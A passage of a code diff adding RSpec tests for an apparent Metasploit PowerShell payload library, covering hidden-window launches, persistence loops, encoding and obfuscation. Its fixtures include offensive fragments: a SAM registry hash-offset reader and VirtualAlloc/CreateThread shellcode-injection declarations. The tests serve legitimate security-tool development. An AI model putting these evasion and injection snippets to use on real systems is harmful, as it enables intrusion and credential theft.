+    context 'when old' do
+      before do
+        subject.datastore['Powershell::method'] = 'old'
+        subject.options.validate(subject.datastore)
+      end
+      it 'should generate a code including unshorted args' do
+        code = subject.run_hidden_psh(payload, arch, encoded)
+        code.include?('-NoProfile -WindowStyle hidden -NoExit -Command ').should be_true
+      end
+    end
+  end
+
+  describe "::cmd_psh_payload" do
+    context 'when payload is huge' do
+      it 'should raise an exception' do
+        except = false
+        begin
+          code = subject.cmd_psh_payload(Rex::Text.rand_text_alpha(12000), arch)
+        rescue RuntimeError => e
+          except = true
+        end
+
+        except.should be_true
+      end
+    end
+
+    context 'when persist is true' do
+      before do
+        subject.datastore['Powershell::persist'] = true
+        subject.options.validate(subject.datastore)
+      end
+      it 'should add a persistance loop' do
+        code = subject.cmd_psh_payload(payload, arch)
+        decompress(code).include?('while(1){Start-Sleep -s ').should be_true
+      end
+    end
+
+    context 'when persist is false' do
+      before do
+        subject.datastore['Powershell::persist'] = false
+        subject.options.validate(subject.datastore)
+      end
+      it 'shouldnt add a persistance loop' do
+        code = subject.cmd_psh_payload(payload, arch)
+        decompress(code).include?('while(1){Start-Sleep -s ').should be_false
+      end
+    end
+
+    context 'when prepend_sleep is set' do
+      before do
+        subject.datastore['Powershell::prepend_sleep'] = 5
+        subject.options.validate(subject.datastore)
+      end
+      it 'should prepend sleep' do
+        code = subject.cmd_psh_payload(payload, arch)
+        decompress(code).include?('Start-Sleep -s ').should be_true
+      end
+    end
+
+    context 'when prepend_sleep isnt set' do
+      before do
+        subject.datastore['Powershell::prepend_sleep'] = nil
+        subject.options.validate(subject.datastore)
+      end
+      it 'shouldnt prepend sleep' do
+        code = subject.cmd_psh_payload(payload, arch)
+        decompress(code).include?('Start-Sleep -s ').should be_false
+      end
+    end
+
+    context 'when prepend_sleep is 0' do
+      before do
+        subject.datastore['Powershell::prepend_sleep'] = 0
+        subject.options.validate(subject.datastore)
+      end
+      it 'shouldnt prepend sleep' do
+        code = subject.cmd_psh_payload(payload, arch)
+        decompress(code).include?('Start-Sleep -s ').should be_false
+      end
+    end
+
+    context 'when method is old' do
+      before do
+        subject.datastore['Powershell::method'] = 'old'
+        subject.options.validate(subject.datastore)
+      end
+      it 'should generate a command line' do
+        code = subject.cmd_psh_payload(payload, arch)
+        decompress(code).include?('-namespace Win32Functions').should be_true
+      end
+      it 'shouldnt shorten args' do
+        code = subject.cmd_psh_payload(payload, arch)
+        code.include?('-NoProfile -WindowStyle hidden -Command').should be_true
+      end
+      it 'should include -NoExit' do
+        code = subject.cmd_psh_payload(payload, arch)
+        code.include?('-NoProfile -WindowStyle hidden -NoExit -Command').should be_true
+      end
+    end
+
+    context 'when method is net' do
+      before do
+        subject.datastore['Powershell::method'] = 'net'
+        subject.options.validate(subject.datastore)
+      end
+      it 'should generate a command line' do
+        code = subject.cmd_psh_payload(payload, arch)
+        decompress(code).include?('System.Runtime.InteropServices;').should be_true
+      end
+    end
+
+    context 'when method is reflection' do
+      before do
+        subject.datastore['Powershell::method'] = 'reflection'
+        subject.options.validate(subject.datastore)
+      end
+      it 'should generate a command line' do
+        code = subject.cmd_psh_payload(payload, arch)
+        decompress(code).include?('GlobalAssemblyCache').should be_true
+      end
+    end
+
+    context 'when method is msil' do
+      before do
+        subject.datastore['Powershell::method'] = 'msil'
+        subject.options.validate(subject.datastore)
+      end
+      it 'should raise an exception' do
+        except = false
+        begin
+          subject.cmd_psh_payload(payload, arch)
+        rescue RuntimeError
+          except = true
+        end
+        except.should be_true
+      end
+    end
+
+    context 'when method is unknown' do
+      before do
+        subject.datastore['Powershell::method'] = 'blah'
+      end
+      it 'should raise an exception' do
+        except = false
+        begin
+          subject.cmd_psh_payload(payload, arch)
+        rescue RuntimeError
+          except = true
+        end
+        except.should be_true
+      end
+      after do
+        subject.datastore['Powershell::method'] = 'reflection'
+        subject.options.validate(subject.datastore)
+      end
+    end
+
+    context 'when encode_inner_payload' do
+      it 'should contain an inner payload with -e' do
+          code = subject.cmd_psh_payload(payload, arch, {:encode_inner_payload => true})
+          code.include?(' -e ').should be_true
+      end
+
+      context 'when no_equals is true' do
+        it 'should raise an exception' do
+          except = false
+          begin
+            code = subject.cmd_psh_payload(payload, arch, {:encode_inner_payload => true, :no_equals => true})
+          rescue RuntimeError
+            except = true
+          end
+          except.should be_true
+        end
+      end
+    end
+
+    context 'when encode_final_payload' do
+      context 'when no_equals is false' do
+        it 'should contain a final payload with -e' do
+          code = subject.cmd_psh_payload(payload, arch, {:encode_final_payload => true, :no_equals => false})
+          code.include?(' -e ').should be_true
+          code.include?(' -c ').should be_false
+        end
+      end
+      context 'when no_equals is true' do
+        it 'should contain a final payload with -e' do
+          code = subject.cmd_psh_payload(payload, arch, {:encode_final_payload => true, :no_equals => true})
+          code.include?(' -e ').should be_true
+          code.include?(' -c ').should be_false
+          code.include?('=').should be_false
+        end
+      end
+      context 'when encode_inner_payload is true' do
+        it 'should raise an exception' do
+          except = false
+          begin
+            subject.cmd_psh_payload(payload, arch, {:encode_final_payload => true, :encode_inner_payload => true})
+          rescue RuntimeError
+            except = true
+          end
+          except.should be_true
+        end
+      end
+    end
+
+    context 'when remove_comspec' do
+      it 'shouldnt contain %COMSPEC%' do
+        code = subject.cmd_psh_payload(payload, arch, {:remove_comspec => true})
+        code.include?('%COMSPEC%').should be_false
+      end
+    end
+
+    context 'when use single quotes' do
+      it 'should wrap in single quotes' do
+        code = subject.cmd_psh_payload(payload, arch, {:use_single_quotes => true})
+        code.include?(' -c \'').should be_true
+      end
+    end
+  end
+
+  describe "::generate_psh_command_line" do
+    it 'should contain no full stop when :no_full_stop' do
+      opts = {:no_full_stop => true}
+      command = subject.generate_psh_command_line(opts)
+      command.include?("powershell ").should be_true
+    end
+
+    it 'should contain full stop unless :no_full_stop' do
+      opts = {}
+      command = subject.generate_psh_command_line(opts)
+      command.include?("powershell.exe ").should be_true
+
+      opts = {:no_full_stop => false}
+      command = subject.generate_psh_command_line(opts)
+      command.include?("powershell.exe ").should be_true
+    end
+
+    it 'should ensure the path should always ends with \\' do
+      opts = {:path => "test"}
+      command = subject.generate_psh_command_line(opts)
+      command.include?("test\\powershell.exe ").should be_true
+
+      opts = {:path => "test\\"}
+      command = subject.generate_psh_command_line(opts)
+      command.include?("test\\powershell.exe ").should be_true
+    end
+  end
+
+  describe "::generate_psh_args" do
+    it 'should return empty string for nil opts' do
+      subject.generate_psh_args(nil).should eql ""
+    end
+
+    command_args = [[:encodedcommand, "parp"],
+                    [:executionpolicy, "bypass"],
+                    [:inputformat, "xml"],
+                    [:file, "x"],
+                    [:noexit, true],
+                    [:nologo, true],
+                    [:noninteractive, true],
+                    [:mta, true],
+                    [:outputformat, 'xml'],
+                    [:sta, true],
+                    [:noprofile, true],
+                    [:windowstyle, "hidden"],
+                    [:command, "Z"]
+    ]
+
+    permutations = (0..command_args.length).to_a.combination(2).map{|i,j| command_args[i...j]}
+
+    permutations.each do |perms|
+      opts = {}
+      perms.each do |k,v|
+        opts[k] = v
+        it "should generate correct arguments for #{opts}" do
+          opts[:shorten] = true
+          short_args = subject.generate_psh_args(opts)
+          opts[:shorten] = false
+          long_args = subject.generate_psh_args(opts)
+
+          opt_length = opts.length - 1
+
+          short_args.should_not be_nil
+          long_args.should_not be_nil
+          short_args.count('-').should eql opt_length
+          long_args.count('-').should eql opt_length
+          short_args[0].should_not eql " "
+          long_args[0].should_not eql " "
+          short_args[-1].should_not eql " "
+          long_args[-1].should_not eql " "
+
+          if opts[:command]
+            long_args[-10..-1].should eql "-Command Z"
+            short_args[-4..-1].should eql "-c Z"
+          end
+       end
+      end
+    end
+  end
+
+end
+
diff --git a/spec/lib/rex/exploitation/powershell/function_spec.rb b/spec/lib/rex/exploitation/powershell/function_spec.rb
new file mode 100644
index 000000000000..bb9159fe2140
--- /dev/null
+++ b/spec/lib/rex/exploitation/powershell/function_spec.rb
@@ -0,0 +1,85 @@
+# -*- coding:binary -*-
+require 'spec_helper'
+
+require 'rex/exploitation/powershell'
+
+describe Rex::Exploitation::Powershell::Function do
+
+  let(:function_name) do
+    Rex::Text.rand_text_alpha(15)
+  end
+
+  let(:example_function_without_params) do
+    """
+{
+    ls HKLM:\SAM\SAM\Domains\Account\Users |
+        where {$_.PSChildName -match \"^[0-9A-Fa-f]{8}$\"} |
+            Add-Member AliasProperty KeyName PSChildName -PassThru |
+            Add-Member ScriptProperty Rid {[Convert]::ToInt32($this.PSChildName, 16)} -PassThru |
+            Add-Member ScriptProperty V {[byte[]]($this.GetValue(\"V\"))} -PassThru |
+            Add-Member ScriptProperty UserName {Get-UserName($this.GetValue(\"V\"))} -PassThru |
+            Add-Member ScriptProperty HashOffset {[BitConverter]::ToUInt32($this.GetValue(\"V\")[0x9c..0x9f],0) + 0xCC} -PassThru
+}"""
+  end
+
+  let(:example_function_with_params) do
+    """
+    {
+        Param
+        (
+            [OutputType([Type])]
+
+            [Parameter( Position = 0)]
+            [Type[]]
+            $Parameters = (New-Object Type[](0)),
+
+            [Parameter( Position = 1 )]
+            [Type]
+            $ReturnType = [Void],
+
+            [String]$Parpy='hello',
+            [Integer] $puppy = 1,
+
+            [Array[]] $stuff = Array[],
+        )
+
+        $Domain = [AppDomain]::CurrentDomain
+        $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')
+        $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
+        $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false)
+        $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
+        $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters)
+        $ConstructorBuilder.SetImplementationFlags('Runtime, Managed')
+        $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)
+        $MethodBuilder.SetImplementationFlags('Runtime, Managed')
+
+        Write-Output $TypeBuilder.CreateType()
+    }"""
+  end
+
+  describe "::initialize" do
+    it 'should handle a function without params' do
+      function = Rex::Exploitation::Powershell::Function.new(function_name, example_function_without_params)
+      function.name.should eq function_name
+      function.code.should eq example_function_without_params
+      function.to_s.include?("function #{function_name} #{example_function_without_params}").should be_true
+      function.params.should be_kind_of Array
+      function.params.empty?.should be_true
+    end
+
+    it 'should handle a function with params' do
+      function = Rex::Exploitation::Powershell::Function.new(function_name, example_function_with_params)
+      function.name.should eq function_name
+      function.code.should eq example_function_with_params
+      function.to_s.include?("function #{function_name} #{example_function_with_params}").should be_true
+      function.params.should be_kind_of Array
+      function.params.length.should be == 5
+      function.params[0].klass.should eq 'Type[]'
+      function.params[0].name.should eq 'Parameters'
+      function.params[1].klass.should eq 'Type'
+      function.params[1].name.should eq 'ReturnType'
+    end
+  end
+
+end
+
diff --git a/spec/lib/rex/exploitation/powershell/obfu_spec.rb b/spec/lib/rex/exploitation/powershell/obfu_spec.rb
new file mode 100644
index 000000000000..39c83ed7bd41
--- /dev/null
+++ b/spec/lib/rex/exploitation/powershell/obfu_spec.rb
@@ -0,0 +1,232 @@
+# -*- coding:binary -*-
+require 'spec_helper'
+
+require 'rex/exploitation/powershell'
+
+describe Rex::Exploitation::Powershell::Obfu do
+
+  let(:example_script_without_literal) do
+"""
+function Find-4624Logons
+{
+
+<#
+
+multiline_comment
+
+#>
+\r\n\r\n\r\n
+\r\n
+
+lots \t of   whitespace
+
+\n\n\n\n\n
+\n\n
+
+
+# single_line_comment1
+    # single_line_comment2
+    #
+    # single_line_comment3    
+   if (-not ($NewLogonAccountDomain -cmatch \"NT\\sAUTHORITY\" -or $NewLogonAccountDomain -cmatch \"Window\\sManager\"))
+        {
+            $Key = $AccountName + $AccountDomain + $NewLogonAccountName + $NewLogonAccountDomain + $LogonType + $WorkstationName + $SourceNetworkAddress + $SourcePort
+            if (-not $ReturnInfo.ContainsKey($Key))
+            {
+                $Properties = @{
+                    LogType = 4624
+                    LogSource = \"Security\"
+                    SourceAccountName = $AccountName
+                    SourceDomainName = $AccountDomain
+                    NewLogonAccountName = $NewLogonAccountName
+                    NewLogonAccountDomain = $NewLogonAccountDomain
+                    LogonType = $LogonType
+                    WorkstationName = $WorkstationName
+                    SourceNetworkAddress = $SourceNetworkAddress
+                    SourcePort = $SourcePort
+                    Count = 1
+                    Times = @($Logon.TimeGenerated)
+                }
+
+                $ResultObj = New-Object PSObject -Property $Properties
+                $ReturnInfo.Add($Key, $ResultObj)
+            }
+            else
+            {
+                $ReturnInfo[$Key].Count++
+                $ReturnInfo[$Key].Times += ,$Logon.TimeGenerated
+            }
+        }
+    }
+}"""
+
+  end
+
+  let(:example_script) do
+"""
+function Find-4624Logons
+{
+
+<#
+
+multiline_comment
+
+#>
+\r\n\r\n\r\n
+\r\n
+
+lots \t of   whitespace
+
+\n\n\n\n\n
+\n\n
+
+
+# single_line_comment1
+    # single_line_comment2
+    #
+    # single_line_comment3    
+    $some_literal = @\"
+  using System;
+  using System.Runtime.InteropServices;
+  namespace $kernel32 {
+    public class func {
+      [Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
+      [Flags] public enum MemoryProtection { ExecuteReadWrite = 0x40 }
+      [Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }
+      [DllImport(\"kernel32.dll\")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
+      [DllImport(\"kernel32.dll\")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
+      [DllImport(\"kernel32.dll\")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);
+    }
+  }
+\"@
+   if (-not ($NewLogonAccountDomain -cmatch \"NT\\sAUTHORITY\" -or $NewLogonAccountDomain -cmatch \"Window\\sManager\"))
+        {
+            $Key = $AccountName + $AccountDomain + $NewLogonAccountName + $NewLogonAccountDomain + $LogonType + $WorkstationName + $SourceNetworkAddress + $SourcePort
+            if (-not $ReturnInfo.ContainsKey($Key))
+            {
+                $Properties = @{
+                    LogType = 4624
+                    LogSource = \"Security\"
+                    SourceAccountName = $AccountName
+                    SourceDomainName = $AccountDomain
+                    NewLogonAccountName = $NewLogonAccountName
+                    NewLogonAccountDomain = $NewLogonAccountDomain
+                    LogonType = $LogonType
+                    WorkstationName = $WorkstationName
+                    SourceNetworkAddress = $SourceNetworkAddress
+                    SourcePort = $SourcePort
+                    Count = 1
+                    Times = @($Logon.TimeGenerated)
+                }
+                $literal2 = @\"parp\"@
+                $ResultObj = New-Object PSObject -Property $Properties
+                $ReturnInfo.Add($Key, $ResultObj)
+            }
+            else
+            {
+                $ReturnInfo[$Key].Count++
+                $ReturnInfo[$Key].Times += ,$Logon.TimeGenerated
+            }
+        }
+    }
+}"""
+
+  end
+
+  let(:subject) do
+    Rex::Exploitation::Powershell::Script.new(example_script)
+  end
+
+  let(:subject_no_literal) do
+    Rex::Exploitation::Powershell::Script.new(example_script_without_literal)
+  end
+
+  describe "::strip_comments" do
+    it 'should strip a multiline comment' do
+      subject.strip_comments
+      subject.code.should be
+      subject.code.should be_kind_of String
+      subject.code.include?('comment').should be_false
+    end
+
+    it 'should strip a single line comment' do
+      subject.strip_comments
+      subject.code.should be
+      subject.code.should be_kind_of String
+      subject.code.include?('#').should be_false
+    end
+  end
+
+  describe "::strip_empty_lines" do
+    it 'should strip extra windows new lines' do
+      subject.strip_empty_lines
+      subject.code.should be
+      subject.code.should be_kind_of String
+      res = (subject.code =~ /\r\n\r\n/)
+      res.should be_false
+    end
+
+    it 'should strip extra unix new lines' do
+      subject.strip_empty_lines
+      subject.code.should be
+      subject.code.should be_kind_of String
+      res = (subject.code =~ /\n\n/)
+      res.should be_false
+    end
+  end
+
+  describe "::strip_whitespace" do
+    it 'should strip additional whitespace' do
+      subject.strip_whitespace
+      subject.code.should be
+      subject.code.should be_kind_of String
+      subject.code.include?('lots of whitespace').should be_true
+    end
+  end
+
+  describe "::sub_vars" do
+    it 'should replace variables with unique names' do
+      subject.sub_vars
+      subject.code.should be
+      subject.code.should be_kind_of String
+      subject.code.include?('$kernel32').should be_false
+      subject.code.include?('$Logon').should be_false
+    end
+  end
+
+  describe "::sub_funcs" do
+    it 'should replace functions with unique names' do
+      subject.sub_funcs
+      subject.code.should be
+      subject.code.should be_kind_of String
+      subject.code.include?('Find-4624Logons').should be_false
+    end
+  end
+
+  describe "::standard_subs" do
+    it 'should run all substitutions on a script with no literals' do
+      subject_no_literal.standard_subs
+      subject_no_literal.code.should be
+      subject_no_literal.code.should be_kind_of String
+      subject_no_literal.code.include?('Find-4624Logons').should be_false
+      subject_no_literal.code.include?('lots of whitespace').should be_true
+      subject_no_literal.code.include?('$kernel32').should be_false
+      subject_no_literal.code.include?('comment').should be_false
+      res = (subject_no_literal.code =~ /\r\n\r\n/)
+      res.should be_false
+    end
+
+    it 'should run all substitutions except strip whitespace when literals are present' do
+      subject.standard_subs
+      subject.code.should be
+      subject.code.should be_kind_of String
+      subject.code.include?('Find-4624Logons').should be_false
+      subject.code.include?('lots of whitespace').should be_false
+      subject.code.include?('$kernel32').should be_false
+      subject.code.include?('comment').should be_false
+      res = (subject.code =~ /\r\n\r\n/)
+      res.should be_false
+    end
+  end
+end
+
diff --git a/spec/lib/rex/exploitation/powershell/output_spec.rb b/spec/lib/rex/exploitation/powershell/output_spec.rb
new file mode 100644
index 000000000000..e57bf778889c
--- /dev/null
+++ b/spec/lib/rex/exploitation/powershell/output_spec.rb
@@ -0,0 +1,115 @@
+# -*- coding:binary -*-
+require 'spec_helper'
+
+require 'rex/exploitation/powershell'
+
+describe Rex::Exploitation::Powershell::Output do
+
+  let(:example_script) do
+    Rex::Text.rand_text_alpha(400)
+  end
+
+  let(:subject) do
+    Rex::Exploitation::Powershell::Script.new(example_script)
+  end
+
+  let(:eof) do
+    Rex::Text.rand_text_alpha(10)
+  end
+
+  describe "::to_s" do
+    it 'should print the script' do
+      subject.to_s.should eq example_script
+    end
+  end
+
+  describe "::size" do
+    it 'should return the size of the script' do
+      subject.size.should eq example_script.size
+    end
+  end
+
+  describe "::to_s_lineno" do
+    it 'should print the script with line numbers' do
+      subject.to_s_lineno.should eq "0: #{example_script}"
+    end
+  end
+
+  describe "::deflate_code" do
+    it 'should zlib the code and wrap in powershell in uncompression stub' do
+      compressed = subject.deflate_code
+      compressed.include?('IO.Compression.DeflateStream').should be_true
+      compressed =~ /FromBase64String\('([A-Za-z0-9\/+=]+)'\)/
+      $1.size.should be < Rex::Text.encode_base64(example_script).size
+      compressed.should eq subject.code
+    end
+
+    it 'should append an eof marker if specified' do
+      compressed = subject.deflate_code(eof)
+      compressed.include?("echo '#{eof}';").should be_true
+    end
+  end
+
+  describe "::encode_code" do
+    it 'should base64 encode the code' do
+      encoded = subject.encode_code
+      encoded.should eq subject.code
+      encoded =~ /^([A-Za-z0-9\/+=]+)$/
+      $1.size.should eq encoded.size
+    end
+  end
+
+  describe "::gzip_code" do
+    it 'should gzip the code and wrap in powershell in uncompression stub' do
+      compressed = subject.gzip_code
+      compressed.include?('IO.Compression.GzipStream').should be_true
+      compressed =~ /FromBase64String\('([A-Za-z0-9\/+=]+)'\)/
+      $1.size.should be < Rex::Text.encode_base64(example_script).size
+      compressed.should eq subject.code
+    end
+
+    it 'should append an eof marker if specified' do
+      compressed = subject.gzip_code(eof)
+      compressed.include?("echo '#{eof}';").should be_true
+    end
+  end
+
+  describe "::compress_code" do
+    it 'should gzip by default' do
+      compressed = subject.compress_code
+      compressed.include?('IO.Compression.GzipStream').should be_true
+    end
+
+    it 'should deflate if gzip is false' do
+      compressed = subject.compress_code(nil,false)
+      compressed.include?('IO.Compression.DeflateStream').should be_true
+    end
+
+    it 'should append an eof' do
+      compressed = subject.compress_code(eof)
+      compressed.include?("echo '#{eof}';").should be_true
+    end
+  end
+
+  describe "::decompress_code" do
+    it 'should locate the base64 string and decompress it when deflate is used' do
+      compressed = subject.compress_code(nil, false)
+      decompressed = subject.decompress_code
+      decompressed.should eq example_script
+    end
+
+    it 'should locate the base64 string and decompress it when gzip is used' do
+      compressed = subject.compress_code
+      decompressed = subject.decompress_code
+      decompressed.should eq example_script
+    end
+
+    it 'should raise a RuntimeException if the Base64 string is not compressed/corrupted' do
+      corrupted = "FromBase64String('parp')"
+      subject.code = corrupted
+      expect { subject.decompress_code }.to raise_error(RuntimeError)
+      subject.code.should eq corrupted
+    end
+  end
+end
+
diff --git a/spec/lib/rex/exploitation/powershell/param_spec.rb b/spec/lib/rex/exploitation/powershell/param_spec.rb
new file mode 100644
index 000000000000..2ae71205c23d
--- /dev/null
+++ b/spec/lib/rex/exploitation/powershell/param_spec.rb
@@ -0,0 +1,27 @@
+# -*- coding:binary -*-
+require 'spec_helper'
+
+require 'rex/exploitation/powershell'
+
+describe Rex::Exploitation::Powershell::Param do
+
+  let(:param_name) do
+    Rex::Text.rand_text_alpha(15)
+  end
+
+  let(:klass_name) do
+    Rex::Text.rand_text_alpha(15)
+  end
+
+  describe "::initialize" do
+    it 'should create a param' do
+      param = Rex::Exploitation::Powershell::Param.new(klass_name, param_name)
+      param.should be
+      param.name.should eq param_name
+      param.klass.should eq klass_name
+      param.to_s.include?("[#{klass_name}]$#{param_name}").should be_true
+    end
+  end
+
+end
+
diff --git a/spec/lib/rex/exploitation/powershell/parser_spec.rb b/spec/lib/rex/exploitation/powershell/parser_spec.rb
new file mode 100644
index 000000000000..5705c6367986
--- /dev/null
+++ b/spec/lib/rex/exploitation/powershell/parser_spec.rb
@@ -0,0 +1,159 @@
+# -*- coding:binary -*-
+require 'spec_helper'
+
+require 'rex/exploitation/powershell'
+
+describe Rex::Exploitation::Powershell::Parser do
+
+  let(:example_script) do
+"""
+function Find-4624Logons
+{
+    $some_literal = @\"
+  using System;
+  using System.Runtime.InteropServices;
+  namespace $kernel32 {
+    public class func {
+      [Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
+      [Flags] public enum MemoryProtection { ExecuteReadWrite = 0x40 }
+      [Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }
+      [DllImport(\"kernel32.dll\")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
+      [DllImport(\"kernel32.dll\")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
+      [DllImport(\"kernel32.dll\")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);
+    }
+  }
+\"@
+   if (-not ($NewLogonAccountDomain -cmatch \"NT\\sAUTHORITY\" -or $NewLogonAccountDomain -cmatch \"Window\\sManager\"))
+        {
+            $Key = $AccountName + $AccountDomain + $NewLogonAccountName + $NewLogonAccountDomain + $LogonType + $WorkstationName + $SourceNetworkAddress + $SourcePort
+            if (-not $ReturnInfo.ContainsKey($Key))
+            {
+                $Properties = @{
+                    LogType = 4624
+                    LogSource = \"Security\"
+                    SourceAccountName = $AccountName
+                    SourceDomainName = $AccountDomain
+                    NewLogonAccountName = $NewLogonAccountName
+                    NewLogonAccountDomain = $NewLogonAccountDomain
+                    LogonType = $LogonType
+                    WorkstationName = $WorkstationName
+                    SourceNetworkAddress = $SourceNetworkAddress
+                    SourcePort = $SourcePort
+                    Count = 1
+                    Times = @($Logon.TimeGenerated)
+                }
+                $literal2 = @\"parp\"@
+                $ResultObj = New-Object PSObject -Property $Properties
+                $ReturnInfo.Add($Key, $ResultObj)
+            }
+            else
+            {
+                $ReturnInfo[$Key].Count++
+                $ReturnInfo[$Key].Times += ,$Logon.TimeGenerated
+            }
+        }
+    }
+}"""
+
+  end
+
+  let(:subject) do
+    Rex::Exploitation::Powershell::Script.new(example_script)
+  end
+
+  describe "::get_var_names" do
+    it 'should return some variable names' do
+      vars = subject.get_var_names
+      vars.should be
+      vars.should be_kind_of Array
+      vars.length.should be > 0
+      vars.include?('$ResultObj').should be_true
+    end
+
+    it 'should not match upper or lowercase reserved names' do
+      initial_vars = subject.get_var_names
+      subject.code << "\r\n$SHELLID"
+      subject.code << "\r\n$ShellId"
+      subject.code << "\r\n$shellid"
+      after_vars = subject.get_var_names
+      initial_vars.should eq after_vars
+    end
+  end
+
+  describe "::get_func_names" do
+    it 'should return some function names' do
+      funcs = subject.get_func_names
+      funcs.should be
+      funcs.should be_kind_of Array
+      funcs.length.should be > 0
+      funcs.include?('Find-4624Logons').should be_true
+    end
+  end
+
+  describe "::get_string_literals" do
+    it 'should return some string literals' do
+      literals = subject.get_string_literals
+      literals.should be
+      literals.should be_kind_of Array
+      literals.length.should be > 0
+      literals[0].include?('parp').should be_false
+    end
+  end
+
+  describe "::scan_with_index" do
+    it 'should scan code and return the items with an index' do
+      scan = subject.scan_with_index('DllImport')
+      scan.should be
+      scan.should be_kind_of Array
+      scan.length.should be > 0
+      scan[0].should be_kind_of Array
+      scan[0][0].should be_kind_of String
+      scan[0][1].should be_kind_of Integer
+    end
+  end
+
+  describe "::match_start" do
+    it 'should match the correct brackets' do
+      subject.match_start('{').should eq '}'
+      subject.match_start('(').should eq ')'
+      subject.match_start('[').should eq ']'
+      subject.match_start('<').should eq '>'
+      expect { subject.match_start('p') }.to raise_exception(ArgumentError)
+    end
+  end
+
+  describe "::block_extract" do
+    it 'should extract a block between brackets given an index' do
+      idx = subject.code.index('{')
+      block = subject.block_extract(idx)
+      block.should be
+      block.should be_kind_of String
+    end
+
+    it 'should raise a runtime error if given an invalid index' do
+      expect { subject.block_extract(nil) }.to raise_error(ArgumentError)
+      expect { subject.block_extract(-1) }.to raise_error(ArgumentError)
+      expect { subject.block_extract(subject.code.length) }.to raise_error(ArgumentError)
+      expect { subject.block_extract(59) }.to raise_error(ArgumentError)
+    end
+  end
+
+  describe "::get_func" do
+    it 'should extract a function from the code' do
+      function = subject.get_func('Find-4624Logons')
+      function.should be
+      function.should be_kind_of Rex::Exploitation::Powershell::Function
+    end
+
+    it 'should return nil if function doesnt exist' do
+      function = subject.get_func(Rex::Text.rand_text_alpha(5))
+      function.should be_nil
+    end
+
+    it 'should delete the function if delete is true' do
+      function = subject.get_func('Find-4624Logons', true)
+      subject.code.include?('DllImport').should be_false
+    end
+  end
+end
+
diff --git a/spec/lib/rex/exploitation/powershell/psh_methods_spec.rb b/spec/lib/rex/exploitation/powershell/psh_methods_spec.rb
new file mode 100644
index 000000000000..a94924f21554
--- /dev/null
+++ b/spec/lib/rex/exploitation/powershell/psh_methods_spec.rb
@@ -0,0 +1,44 @@
+# -*- coding:binary -*-
+require 'spec_helper'
+
+require 'rex/exploitation/powershell'
+
+describe Rex::Exploitation::Powershell::PshMethods do
+
+  describe "::download" do
+    it 'should return some powershell' do
+      script = Rex::Exploitation::Powershell::PshMethods.download('a','b')
+      script.should be
+      script.include?('WebClient').should be_true
+    end
+  end
+  describe "::uninstall" do
+    it 'should return some powershell' do
+      script = Rex::Exploitation::Powershell::PshMethods.uninstall('a')
+      script.should be
+      script.include?('Win32_Product').should be_true
+    end
+  end
+  describe "::secure_string" do
+    it 'should return some powershell' do
+      script = Rex::Exploitation::Powershell::PshMethods.secure_string('a')
+      script.should be
+      script.include?('AsPlainText').should be_true
+    end
+  end
+  describe "::who_locked_file" do
+    it 'should return some powershell' do
+      script = Rex::Exploitation::Powershell::PshMethods.who_locked_file('a')
+      script.should be
+      script.include?('Get-Process').should be_true
+    end
+  end
+  describe "::get_last_login" do
+    it 'should return some powershell' do
+      script = Rex::Exploitation::Powershell::PshMethods.get_last_login('a')
+      script.should be
+      script.include?('Get-QADComputer').should be_true
+    end
+  end
+end
+
diff --git a/spec/lib/rex/exploitation/powershell/script_spec.rb b/spec/lib/rex/exploitation/powershell/script_spec.rb
new file mode 100644
index 000000000000..7b7b8496062b
--- /dev/null
+++ b/spec/lib/rex/exploitation/powershell/script_spec.rb
@@ -0,0 +1,48 @@
+# -*- coding:binary -*-
+require 'spec_helper'
+
+require 'rex/exploitation/powershell'
+
+describe Rex::Exploitation::Powershell::Output do
+
+  let(:example_script) do
+    Rex::Text.rand_text_alpha(400)
+  end
+
+  let(:subject) do
+    Rex::Exploitation::Powershell::Script.new(example_script)
+  end
+
+  describe "::initialize" do
+    it 'should create a new script object' do
+      subject.should be
+      subject.should be_kind_of Rex::Exploitation::Powershell::Script
+      subject.rig.should be
+      subject.rig.should be_kind_of Rex::RandomIdentifierGenerator
+      subject.code.should be
+      subject.code.should be_kind_of String
+      subject.code.empty?.should be_false
+      subject.functions.empty?.should be_true
+    end
+  end
+
+  describe "::to_byte_array" do
+    it 'should generate a powershell byte array' do
+      byte_array = Rex::Exploitation::Powershell::Script.to_byte_array("parp")
+      byte_array.should be
+      byte_array.should be_kind_of String
+      byte_array.include?('[Byte[]] $').should be_true
+    end
+  end
+
+  describe "::code_modifiers" do
+    it 'should return an array of modifier methods' do
+      mods = Rex::Exploitation::Powershell::Script.code_modifiers
+      mods.should be
+      mods.should be_kind_of Array
+      mods.empty?.should be_false
+    end
+  end
+
+end
+
diff --git a/spec/lib/rex/exploitation/powershell_spec.rb b/spec/lib/rex/exploitation/powershell_spec.rb
new file mode 100644
index 000000000000..688569196315
--- /dev/null
+++ b/spec/lib/rex/exploitation/powershell_spec.rb
@@ -0,0 +1,47 @@
+# -*- coding:binary -*-
+require 'spec_helper'
+
+require 'rex/exploitation/powershell'
+
+describe Rex::Exploitation::Powershell do
+
+  let(:example_script) do
+    """function DumpHashes
+{
